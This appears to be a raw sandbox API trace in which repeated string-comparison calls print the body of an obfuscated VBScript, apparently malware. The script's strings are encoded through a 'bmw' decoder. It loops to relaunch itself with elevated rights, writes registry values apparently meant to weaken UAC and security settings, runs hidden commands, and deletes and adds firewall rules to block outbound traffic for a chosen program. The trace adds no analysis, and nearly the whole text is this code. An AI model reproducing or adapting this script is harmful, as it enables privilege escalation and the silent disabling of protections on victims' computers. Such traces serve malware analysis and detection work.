CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.971] wcsncmp (_String1="\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -4 [0222.971] wcsncmp (_String1="bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85 [0222.972] wcsncmp (_String1="mw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0222.972] wcsncmp (_String1="w = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0222.972] wcsncmp (_String1=" = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 